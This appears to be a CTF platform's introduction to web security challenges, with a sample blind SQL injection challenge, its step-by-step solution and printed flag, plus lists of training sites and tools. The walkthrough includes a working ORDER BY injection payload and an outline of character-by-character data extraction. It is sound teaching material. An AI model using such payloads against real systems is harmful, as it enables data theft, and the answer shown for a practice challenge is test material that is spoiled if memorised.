🌐

Web Security

Web challenges test your ability to find and exploit vulnerabilities in websites and APIs. Topics range from classic injection attacks to modern OAuth/JWT flaws, SSRF, GraphQL abuse, and prototype pollution.

What is it?

Web security is the practice of finding and fixing vulnerabilities in websites, web applications, and APIs. Attackers exploit these flaws to steal data, hijack accounts, execute commands on servers, or pivot deeper into an organisation's infrastructure.

It is one of the most impactful security disciplines because nearly every business has a public-facing web presence. A single misconfigured endpoint can expose millions of user records.

How it works in a CTF

In a CTF, you are given a URL (or a source-code dump) and must find a vulnerability to read a hidden flag. Challenges are self-contained web apps that deliberately contain one or more bugs — your job is to discover and exploit them before other teams.

Common workflows: intercept HTTP traffic with Burp Suite → inspect parameters and cookies → fuzz inputs → research the bug class → craft a proof-of-concept → extract the flag from the server response or database.

Example challenge types
SQL Injection (dump the DB)XSS → cookie theftSSRF → cloud metadataIDOR (access another user's data)JWT algorithm confusionSSTI (server-side template injection)Path traversal / LFIOAuth state bypassGraphQL introspection abuseCORS misconfigurationXXE (external entity injection)Command injection via form field

Sample Challenge

Blind Order
Web Medium 250 pts
A small e-commerce site lets you sort products by column name via a ?sort= query parameter. The application passes this value directly into a SQL ORDER BY clause — sanitising only for spaces. There is no visible error output, making this a blind SQL injection.
shop.zip
How to solve it
  1. Intercept the GET /products?sort=name request in Burp Suite.
  2. Notice the parameter is reflected in an ORDER BY clause by testing sort=name ASC vs sort=name DESC.
  3. Use a boolean-based payload: sort=(CASE WHEN 1=1 THEN name ELSE price END) — the order changes, confirming blind injection.
  4. Write a Python loop using SUBSTR() to extract the flag column from the secrets table letter by letter.
  5. Assemble the bytes into the flag string.
FLAG{bl1nd_0rd3r_by_expl01t}

Official Resources & Standards

OWASP Foundation
The Open Web Application Security Project — the gold standard for web app security guidance.
FoundationStandards
OWASP Top 10
The ten most critical web application security risks, updated regularly.
ReferenceStandards
OWASP Cheat Sheet Series
Concise, developer-focused cheat sheets covering XXE, CSRF, XSS, SQLi and dozens more.
Reference
CWE Top 25
MITRE's list of the most dangerous software weaknesses.
Reference
MDN Web Docs — Security
Mozilla's canonical documentation on browser security, CSP, and CORS.
Docs
Web Security on RFC Editor
Official IETF RFCs for HTTP, TLS, OAuth 2.0, and other web standards.
Standards

Free Training & Practice

PortSwigger Web Security Academy
Completely free learning platform with 200+ interactive labs covering every major web vuln.
FreeLabsBeginner→Advanced
OWASP Juice Shop
Intentionally insecure Node.js web app with 100+ challenges from beginner to advanced.
FreeLab App
OWASP WebGoat
Deliberately insecure app designed to teach web security lessons step-by-step.
FreeLab App
TryHackMe — Web Fundamentals
Guided learning path covering HTTP, web enumeration, OWASP Top 10, and common exploits.
Free TierGuided
HackTheBox Academy — Web Attacks
Hands-on module on XSS, SQLi, IDOR, SSRF, and more with real lab environments.
Free TierLabs
PentesterLab
Progressive exercises from basic web bugs to advanced CVE replicas. Many exercises are free.
Free TierLabs
DVWA
Damn Vulnerable Web Application — classic self-hosted practice target with adjustable difficulty.
FreeLab App
picoCTF
Carnegie Mellon's beginner-friendly CTF platform with a large Web category.
FreeCTF

Essential Tools

Burp Suite Community
The industry-standard web proxy for intercepting and modifying HTTP traffic.
FreeProxy
OWASP ZAP
Open-source web scanner and proxy — great free alternative to Burp Suite.
FreeOpen Source
sqlmap
Automatic SQL injection detection and exploitation tool.
FreeOpen Source
ffuf
Fast web fuzzer for directory busting, parameter fuzzing, and subdomain discovery.
FreeOpen Source

Getting Started Tips

💡 Tip: Start every web challenge by mapping the app: enumerate endpoints, parameters, cookies, and headers before attempting exploits.
💡 Tip: PortSwigger Web Security Academy is the single best free resource — complete the SQLi, XSS, and SSRF labs first.
💡 Tip: Set up Burp Suite's browser extension and develop the habit of inspecting every HTTP request/response.
💡 Tip: Read writeups after every challenge you solve or give up on — patterns repeat across competitions.